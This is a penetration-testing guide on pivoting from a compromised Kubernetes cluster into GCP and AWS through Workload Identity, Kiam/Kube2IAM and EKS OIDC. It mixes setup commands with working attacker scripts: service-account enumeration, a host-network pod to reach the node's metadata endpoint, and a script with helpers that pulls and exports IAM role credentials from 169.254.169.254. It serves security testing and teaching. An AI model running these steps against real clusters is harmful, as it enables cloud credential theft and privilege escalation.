Kubernetes Pivoting to Clouds

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

If you are running a k8s cluster inside GCP you will probably want some application running inside the cluster to have access to GCP. There are 2 common ways of doing that:

Mounting GCP-SA keys as secret

A common way to give a Kubernetes application access to GCP is to:

  • Create a GCP Service Account

  • Bind the desired permissions to it

  • Download a json key of the created SA

  • Mount it as a secret inside the pod

  • Set the GOOGLE_APPLICATION_CREDENTIALS environment variable pointing to the path where the json is.
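
The steps above can be sketched as a Pod manifest (the secret name, image and mount path are hypothetical examples, not fixed values):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: gcp-app
spec:
  containers:
  - name: app
    image: my-app            # hypothetical application image
    env:
    # The Google client libraries read the key from this env variable
    - name: GOOGLE_APPLICATION_CREDENTIALS
      value: /var/secrets/google/key.json
    volumeMounts:
    - name: gsa-key
      mountPath: /var/secrets/google
      readOnly: true
  volumes:
  - name: gsa-key
    secret:
      secretName: gsa-key    # secret created from the downloaded JSON key
```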

Therefore, as an attacker, if you compromise a container inside a pod, you should check for that env variable and json files with GCP credentials.
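A minimal sketch of that hunt from inside a compromised container (the helper name is hypothetical; SA key files are JSON documents containing `"type": "service_account"`):

```shell
#!/bin/sh
# Hypothetical helper: flag JSON files under a directory that look like
# GCP service account keys (they contain "type": "service_account").
find_gcp_keys() {
    dir="$1"
    find "$dir" -name '*.json' 2>/dev/null | while read -r f; do
        if grep -q '"type": *"service_account"' "$f" 2>/dev/null; then
            echo "Possible GCP SA key: $f"
        fi
    done
}

# Typical checks once inside the container:
# echo "$GOOGLE_APPLICATION_CREDENTIALS"
# find_gcp_keys /var/run/secrets
# find_gcp_keys /home
```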

Relating GSA json to KSA secret

A way to give a GKE cluster access to a GSA is by binding them in this way:

  • Create a Kubernetes service account in the same namespace as your GKE cluster using the following command:

kubectl create serviceaccount <service-account-name>
  • Create a Kubernetes Secret that contains the credentials of the GCP service account you want to grant access to the GKE cluster. You can do this using the gcloud command-line tool, as shown in the following example:

gcloud iam service-accounts keys create <key-file-name>.json \
    --iam-account <gcp-service-account-email>
kubectl create secret generic <secret-name> \
    --from-file=key.json=<key-file-name>.json
  • Bind the Kubernetes Secret to the Kubernetes service account using the following command:

kubectl annotate serviceaccount <service-account-name> \
    iam.gke.io/gcp-service-account=<gcp-service-account-email>

In the second step the credentials of the GSA were stored as a secret of the KSA. Then, if you can read that secret from inside the GKE cluster, you can escalate to that GCP service account.

GKE Workload Identity

With Workload Identity, we can configure a Kubernetes service account to act as a Google service account. Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.

The first series of steps to enable this behaviour is to enable Workload Identity in GCP and create the GCP SA you want k8s to impersonate.

  • Enable Workload Identity on the cluster

gcloud container clusters update <cluster_name> \
    --region=us-central1 \
    --workload-pool=<project-id>.svc.id.goog
  • Create/Update a new nodepool (Autopilot clusters don't need this)

# You could update instead of create
gcloud container node-pools create <nodepoolname> --cluster=<cluster_name> --workload-metadata=GKE_METADATA --region=us-central1
  • Create the GCP Service Account to impersonate from K8s with GCP permissions:

# Create SA called "gsa2ksa"
gcloud iam service-accounts create gsa2ksa --project=<project-id>

# Give "roles/iam.securityReviewer" role to the SA
gcloud projects add-iam-policy-binding <project-id> \
    --member "serviceAccount:gsa2ksa@<project-id>.iam.gserviceaccount.com" \
    --role "roles/iam.securityReviewer"
  • Connect to the cluster and create the service account to use

# Get k8s creds
gcloud container clusters get-credentials <cluster_name> --region=us-central1

# Generate our testing namespace
kubectl create namespace testing

# Create the KSA
kubectl create serviceaccount ksa2gcp -n testing
  • Bind the GSA with the KSA

# Allow the KSA to access the GSA in GCP IAM
gcloud iam service-accounts add-iam-policy-binding gsa2ksa@<project-id>.iam.gserviceaccount.com \
    --role roles/iam.workloadIdentityUser \
    --member "serviceAccount:<project-id>.svc.id.goog[<namespace>/ksa2gcp]"

# Indicate to K8s that the SA is able to impersonate the GSA
kubectl annotate serviceaccount ksa2gcp \
    --namespace testing \
    iam.gke.io/gcp-service-account=gsa2ksa@<project-id>.iam.gserviceaccount.com
  • Run a pod with the KSA and check the access to GSA:

# If using Autopilot remove the nodeSelector stuff!
echo "apiVersion: v1
kind: Pod
metadata:
  name: workload-identity-test
  namespace: <namespace>
spec:
  containers:
  - image: google/cloud-sdk:slim
    name: workload-identity-test
    command: ['sleep','infinity']
  serviceAccountName: ksa2gcp
  nodeSelector:
    iam.gke.io/gke-metadata-server-enabled: 'true'" | kubectl apply -f-

# Get inside the pod
kubectl exec -it workload-identity-test \
  --namespace testing \
  -- /bin/bash

# Check you can access the GSA from inside the pod with
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email
gcloud auth list

If needed, use the following command to authenticate:

gcloud auth activate-service-account --key-file=/var/run/secrets/google/service-account/key.json

As an attacker inside K8s you should search for SAs with the iam.gke.io/gcp-service-account annotation, as it indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access. From GCP it is always interesting to enumerate the bindings and know which access you are giving to SAs inside Kubernetes.

This is a script to easily iterate over all the pod definitions looking for that annotation:

for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
    for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
        echo "Pod: $ns/$pod"
        kubectl get pod "$pod" -n "$ns" -o yaml | grep "gcp-service-account"
        echo ""
        echo ""
    done
done | grep -B 1 "gcp-service-account"


Kiam & Kube2IAM (IAM role for Pods)

An (outdated) way to give IAM Roles to Pods is to use a Kiam or a Kube2IAM server. Basically you run a daemonset in your cluster with a kind of privileged IAM role. This daemonset is the one that grants access to IAM roles to the pods that need them.

First of all you need to configure which roles can be accessed inside the namespace, and you do that with an annotation inside the namespace object:

# Kiam
apiVersion: v1
kind: Namespace
metadata:
  name: iam-example
  annotations:
    iam.amazonaws.com/permitted: ".*"
---
# Kube2iam
apiVersion: v1
kind: Namespace
metadata:
  name: default
  annotations:
    iam.amazonaws.com/allowed-roles: |
      ["<role-name>"]

Once the namespace is configured with the IAM roles the Pods can have, you can indicate the role you want on each pod definition with something like:

# Kiam & Kube2iam
apiVersion: v1
kind: Pod
metadata:
  name: foo
  namespace: external-id-example
  annotations:
    iam.amazonaws.com/role: reportingdb-reader

As an attacker, if you find these annotations in pods or namespaces, or a kiam/kube2iam server running (probably in kube-system), you can impersonate every role that is already used by pods and more (if you have access to the AWS account, enumerate the roles).

Create Pod with IAM Role

The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role, and that role must be able to access it.

echo 'apiVersion: v1
kind: Pod
metadata:
  annotations:
    iam.amazonaws.com/role: transaction-metadata
  name: alpine
  namespace: eevee
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "sleep 100000"]' | kubectl apply -f -

IAM Role for K8s Service Accounts via OIDC

This is the recommended way by AWS.

  1. First of all you need to create an OIDC provider for the cluster.

  2. Then you create an IAM role with the permissions the SA will require.

  3. Create a trust relationship between the IAM role and the SA name (or the namespace, giving access to the role to all the SAs of the namespace). The trust relationship will mainly check the OIDC provider name, the namespace name and the SA name.

  4. Finally, create a SA with an annotation indicating the ARN of the role, and the pods running with that SA will have access to the token of the role. The token is written inside a file and the path is specified in AWS_WEB_IDENTITY_TOKEN_FILE (default: /var/run/secrets/eks.amazonaws.com/serviceaccount/token)

# Create a service account with a role
cat >my-service-account.yaml <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
  name: my-service-account
  namespace: default
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::318142138553:role/EKSOIDCTesting
EOF
kubectl apply -f my-service-account.yaml

# Add a role to an existent service account
kubectl annotate serviceaccount -n $namespace $service_account eks.amazonaws.com/role-arn=arn:aws:iam::$account_id:role/my-role
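Once a pod runs with such a SA, the projected token can be inspected directly. A minimal sketch that decodes the JWT payload to check the `sub`/`aud` claims (decoding only, no signature verification; the helper name is hypothetical):

```shell
#!/bin/sh
# Sketch: decode the payload of the projected SA token (a JWT) to see
# which service account and audience it was issued for.
jwt_payload() {
    # JWT = header.payload.signature, base64url-encoded without padding
    p=$(printf '%s' "$1" | cut -d '.' -f 2 | tr '_-' '/+')
    # restore base64 padding before decoding
    pad=$(( (4 - ${#p} % 4) % 4 ))
    while [ "$pad" -gt 0 ]; do p="${p}="; pad=$((pad - 1)); done
    printf '%s' "$p" | base64 -d
}

# Inside the pod:
# jwt_payload "$(cat /var/run/secrets/eks.amazonaws.com/serviceaccount/token)"
```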

To authenticate with AWS using the token from /var/run/secrets/eks.amazonaws.com/serviceaccount/token, run:

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/EKSOIDCTesting --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token
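Alternatively, the AWS CLI and SDKs assume the role automatically when these two environment variables are set (these are the same variables the EKS webhook injects into pods; the ARN below reuses the example role from above):

```shell
# The SDK credential chain performs AssumeRoleWithWebIdentity on its own
# when both variables are present
export AWS_ROLE_ARN=arn:aws:iam::123456789098:role/EKSOIDCTesting
export AWS_WEB_IDENTITY_TOKEN_FILE=/var/run/secrets/eks.amazonaws.com/serviceaccount/token

# aws sts get-caller-identity   # would now show the assumed role identity
```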

As an attacker, if you can enumerate a K8s cluster, check for service accounts with that annotation to escalate to AWS. To do so, just exec/create a pod using one of the IAM privileged service accounts and steal the token.

Moreover, if you are inside a pod, check for env variables like AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN_FILE.

Sometimes the Trust Policy of a role might be misconfigured and, instead of giving AssumeRole access to the expected service account, it gives it to all the service accounts. Therefore, if you are able to write an annotation on a controlled service account, you can access the role.
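For illustration, a misconfigured trust policy could look like this: the wildcard `sub` condition lets any SA in any namespace of the cluster assume the role (account id, region and OIDC id are placeholders):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::<account-id>:oidc-provider/oidc.eks.<region>.amazonaws.com/id/<oidc-id>"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringLike": {
          "oidc.eks.<region>.amazonaws.com/id/<oidc-id>:sub": "system:serviceaccount:*:*"
        }
      }
    }
  ]
}
```

A safe policy would instead use `StringEquals` with the exact `system:serviceaccount:<namespace>:<sa-name>` value.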

Check the following page for more information:

AWS - Federation Abuse

Find Pods and SAs with IAM Roles in the Cluster

This is a script to easily iterate over all the pod and SA definitions looking for that annotation:

for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
    for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
        echo "Pod: $ns/$pod"
        kubectl get pod "$pod" -n "$ns" -o yaml | grep "amazonaws.com"
        echo ""
        echo ""
    done
    for sa in `kubectl get serviceaccounts -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
        echo "SA: $ns/$sa"
        kubectl get serviceaccount "$sa" -n "$ns" -o yaml | grep "amazonaws.com"
        echo ""
        echo ""
    done
done | grep -B 1 "amazonaws.com"

Node IAM Role

The previous section was about how to steal IAM Roles with pods, but note that a Node of the K8s cluster is going to be an instance inside the cloud. This means that the Node will very likely have its own IAM role you can steal (note that usually all the nodes of a K8s cluster have the same IAM role, so it might not be worth trying each node).

There is however an important requirement: to access the metadata endpoint you need to be on the node (SSH session?) or at least share the node's network:

kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'

Steal IAM Role Token

Previously we have discussed how to attach IAM Roles to Pods or even how to escape to the Node to steal the IAM Role the instance has attached to it.

You can use the following script to steal the IAM role credentials you worked so hard for:

IMDS="http://169.254.169.254/latest/meta-data/iam/security-credentials/"
IAM_ROLE_NAME=$(curl "$IMDS" 2>/dev/null || wget -O - "$IMDS" 2>/dev/null)
if [ "$IAM_ROLE_NAME" ]; then
    echo "IAM Role discovered: $IAM_ROLE_NAME"
    if ! echo "$IAM_ROLE_NAME" | grep -q "empty role"; then
        echo "Credentials:"
        curl "$IMDS$IAM_ROLE_NAME" 2>/dev/null || wget "$IMDS$IAM_ROLE_NAME" -O - 2>/dev/null
    fi
fi
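To actually use what comes back, a small sketch that extracts the fields from the credentials JSON returned by the metadata endpoint and exports them for the aws CLI (the helper name is hypothetical; the field names match the documented IMDS response shape):

```shell
#!/bin/sh
# Sketch: export stolen instance-profile credentials for the aws CLI.
# Expects the JSON body returned by the security-credentials endpoint,
# which contains AccessKeyId, SecretAccessKey and Token fields.
export_imds_creds() {
    json="$1"
    AWS_ACCESS_KEY_ID=$(printf '%s' "$json" | sed -n 's/.*"AccessKeyId" *: *"\([^"]*\)".*/\1/p')
    AWS_SECRET_ACCESS_KEY=$(printf '%s' "$json" | sed -n 's/.*"SecretAccessKey" *: *"\([^"]*\)".*/\1/p')
    AWS_SESSION_TOKEN=$(printf '%s' "$json" | sed -n 's/.*"Token" *: *"\([^"]*\)".*/\1/p')
    export AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN
}

# export_imds_creds "$(curl "$IMDS$IAM_ROLE_NAME" 2>/dev/null)"
# aws sts get-caller-identity
```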

